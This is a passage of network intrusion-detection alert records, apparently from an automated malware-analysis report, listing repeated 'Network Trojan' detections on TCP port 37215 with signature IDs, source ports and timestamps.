                SID:2829579
                Source Port:41914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.127821
                SID:2829579
                Source Port:38294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899269
                SID:2829579
                Source Port:58970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782001
                SID:2835222
                Source Port:54466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666283
                SID:2829579
                Source Port:48334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616035
                SID:2835222
                Source Port:43878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972327
                SID:2829579
                Source Port:51596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.801375
                SID:2829579
                Source Port:52706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371562
                SID:2835222
                Source Port:55702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654397
                SID:2829579
                Source Port:48188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784125
                SID:2835222
                Source Port:35632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712882
                SID:2829579
                Source Port:57182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841357
                SID:2835222
                Source Port:38516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793886
                SID:2829579
                Source Port:43694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149980
                SID:2835222
                Source Port:45762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271464
                SID:2829579
                Source Port:41970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009923
                SID:2829579
                Source Port:47150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779612
                SID:2829579
                Source Port:57986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857285
                SID:2829579
                Source Port:43040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.040704
                SID:2829579
                Source Port:42538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945589
                SID:2829579
                Source Port:38264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896545
                SID:2835222
                Source Port:51032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072467
                SID:2835222
                Source Port:43094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014977
                SID:2835222
                Source Port:54844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714054
                SID:2829579
                Source Port:42780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883798
                SID:2835222
                Source Port:49156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663728
                SID:2829579
                Source Port:53096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702077
                SID:2835222
                Source Port:54848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521942
                SID:2829579
                Source Port:49866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501294
                SID:2829579
                Source Port:39422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854831
                SID:2835222
                Source Port:53520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228132
                SID:2829579
                Source Port:56644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163721
                SID:2829579
                Source Port:46082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897152
                SID:2829579
                Source Port:55984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813335
                SID:2835222
                Source Port:57666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791709
                SID:2829579
                Source Port:37048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521271
                SID:2829579
                Source Port:36162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917612
                SID:2829579
                Source Port:36614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844734
                SID:2835222
                Source Port:60210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504815
                SID:2835222
                Source Port:44244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782679
                SID:2835222
                Source Port:34176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236143
                SID:2835222
                Source Port:57466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265211
                SID:2835222
                Source Port:57858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339696
                SID:2829579
                Source Port:51990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434137
                SID:2829579
                Source Port:37750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074716
                SID:2829579
                Source Port:41864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.183028
                SID:2835222
                Source Port:35592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025684
                SID:2835222
                Source Port:60286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711349
                SID:2835222
                Source Port:55194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557696
                SID:2835222
                Source Port:50160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088125
                SID:2829579
                Source Port:41132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514590
                SID:2829579
                Source Port:60374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.081891
                SID:2835222
                Source Port:46440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375302
                SID:2829579
                Source Port:40992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.591149
                SID:2829579
                Source Port:58290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257209
                SID:2835222
                Source Port:59036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668825
                SID:2835222
                Source Port:32930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032930
                SID:2835222
                Source Port:36726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920884
                SID:2835222
                Source Port:57212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969860
                SID:2829579
                Source Port:51718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287138
                SID:2835222
                Source Port:34338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419209
                SID:2829579
                Source Port:54498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672600
                SID:2835222
                Source Port:39114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039189
                SID:2835222
                Source Port:32832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867628
                SID:2829579
                Source Port:44490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.137787
                SID:2829579
                Source Port:41092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.434678
                SID:2829579
                Source Port:34268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809230
                SID:2835222
                Source Port:40618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227618
                SID:2835222
                Source Port:48484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.610344
                SID:2835222
                Source Port:49250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989747
                SID:2829579
                Source Port:48584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236569
                SID:2829579
                Source Port:57804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900203
                SID:2835222
                Source Port:40464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281696
                SID:2829579
                Source Port:43632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166317
                SID:2829579
                Source Port:36878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.618017
                SID:2835222
                Source Port:42044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964196
                SID:2829579
                Source Port:48204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222904
                SID:2829579
                Source Port:38180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434122
                SID:2829579
                Source Port:43014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766159
                SID:2835222
                Source Port:52288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113331
                SID:2835222
                Source Port:46538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170507
                SID:2829579
                Source Port:51342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097542
                SID:2835222
                Source Port:57024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850400
                SID:2829579
                Source Port:45354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979458
                SID:2835222
                Source Port:47798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559051
                SID:2835222
                Source Port:57802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659836
                SID:2835222
                Source Port:34838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810549
                SID:2835222
                Source Port:47270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845626
                SID:2829579
                Source Port:52778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509250
                SID:2835222
                Source Port:57580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726439
                SID:2829579
                Source Port:45532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667662
                SID:2835222
                Source Port:60890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681891
                SID:2835222
                Source Port:41436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.581189
                SID:2835222
                Source Port:56502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859543
                SID:2829579
                Source Port:35868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683545
                SID:2835222
                Source Port:60962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947627
                SID:2829579
                Source Port:40054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557971
                SID:2835222
                Source Port:43636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844691
                SID:2829579
                Source Port:37934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856099
                SID:2835222
                Source Port:46310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863043
                SID:2829579
                Source Port:54928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422246
                SID:2829579
                Source Port:54132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717217
                SID:2829579
                Source Port:58732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001780
                SID:2835222
                Source Port:53564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507213
                SID:2829579
                Source Port:59332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799552
                SID:2829579
                Source Port:50634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.119412
                SID:2835222
                Source Port:51606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654500
                SID:2835222
                Source Port:42180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726962
                SID:2829579
                Source Port:48508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812870
                SID:2835222
                Source Port:48368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226617
                SID:2835222
                Source Port:50862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331260
                SID:2829579
                Source Port:55016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331637
                SID:2835222
                Source Port:55164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210663
                SID:2835222
                Source Port:51366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228302
                SID:2835222
                Source Port:57634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069770
                SID:2835222
                Source Port:57398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.242158
                SID:2835222
                Source Port:60518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265165
                SID:2835222
                Source Port:51826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419451
                SID:2835222
                Source Port:46564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362813
                SID:2835222
                Source Port:44296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.946772
                SID:2835222
                Source Port:47610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381304
                SID:2829579
                Source Port:54366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559669
                SID:2829579
                Source Port:37398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226556
                SID:2829579
                Source Port:45378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177184
                SID:2829579
                Source Port:36296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933070
                SID:2835222
                Source Port:33834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.564847
                SID:2829579
                Source Port:49602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708527
                SID:2835222
                Source Port:58926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.043269
                SID:2835222
                Source Port:50106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071442
                SID:2829579
                Source Port:50718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524012
                SID:2835222
                Source Port:40104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223144
                SID:2829579
                Source Port:50444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764317
                SID:2829579
                Source Port:42294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598026
                SID:2835222
                Source Port:59178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994633
                SID:2835222
                Source Port:48896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330615
                SID:2835222
                Source Port:39192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626936
                SID:2835222
                Source Port:41902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950266
                SID:2829579
                Source Port:43258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617040
                SID:2835222
                Source Port:51704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868156
                SID:2829579
                Source Port:39736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536129
                SID:2829579
                Source Port:41914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702203
                SID:2835222
                Source Port:58182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914333
                SID:2835222
                Source Port:58190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816860
                SID:2835222
                Source Port:56972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072447
                SID:2829579
                Source Port:60266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113372
                SID:2829579
                Source Port:44640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925389
                SID:2835222
                Source Port:45694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169217
                SID:2829579
                Source Port:40706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781376
                SID:2829579
                Source Port:44278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997792
                SID:2829579
                Source Port:43610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329362
                SID:2835222
                Source Port:57808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234098
                SID:2829579
                Source Port:43376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732253
                SID:2829579
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180181
                SID:2835222
                Source Port:43314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572687
                SID:2829579
                Source Port:43580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531561
                SID:2835222
                Source Port:37960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962405
                SID:2835222
                Source Port:39954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832850
                SID:2835222
                Source Port:53742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933117
                SID:2829579
                Source Port:44478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027307
                SID:2829579
                Source Port:39584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.913063
                SID:2829579
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160910
                SID:2835222
                Source Port:51386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842358
                SID:2835222
                Source Port:52072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233792
                SID:2829579
                Source Port:50940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916879
                SID:2835222
                Source Port:51476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841477
                SID:2835222
                Source Port:41198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083505
                SID:2835222
                Source Port:53936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610307
                SID:2829579
                Source Port:44852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630063
                SID:2835222
                Source Port:47166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896833
                SID:2835222
                Source Port:53110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962659
                SID:2835222
                Source Port:43210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791608
                SID:2835222
                Source Port:47186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653963
                SID:2829579
                Source Port:37990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783778
                SID:2829579
                Source Port:37098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859029
                SID:2829579
                Source Port:59032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853269
                SID:2829579
                Source Port:53008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.907473
                SID:2835222
                Source Port:46498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042407
                SID:2835222
                Source Port:42980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841717
                SID:2829579
                Source Port:45028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814347
                SID:2829579
                Source Port:39900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586784
                SID:2829579
                Source Port:33906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681602
                SID:2829579
                Source Port:60956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228275
                SID:2829579
                Source Port:34734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447330
                SID:2829579
                Source Port:59480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286058
                SID:2829579
                Source Port:41450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227404
                SID:2835222
                Source Port:48580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.167415
                SID:2829579
                Source Port:57680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281922
                SID:2829579
                Source Port:54010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.229235
                SID:2829579
                Source Port:39438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857020
                SID:2829579
                Source Port:46392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615333
                SID:2829579
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.692215
                SID:2829579
                Source Port:57510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264758
                SID:2829579
                Source Port:50954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.029628
                SID:2835222
                Source Port:55658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.326072
                SID:2829579
                Source Port:41900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385113
                SID:2835222
                Source Port:36724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.674910
                SID:2835222
                Source Port:49600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227781
                SID:2829579
                Source Port:39662
                Destination Port:37215
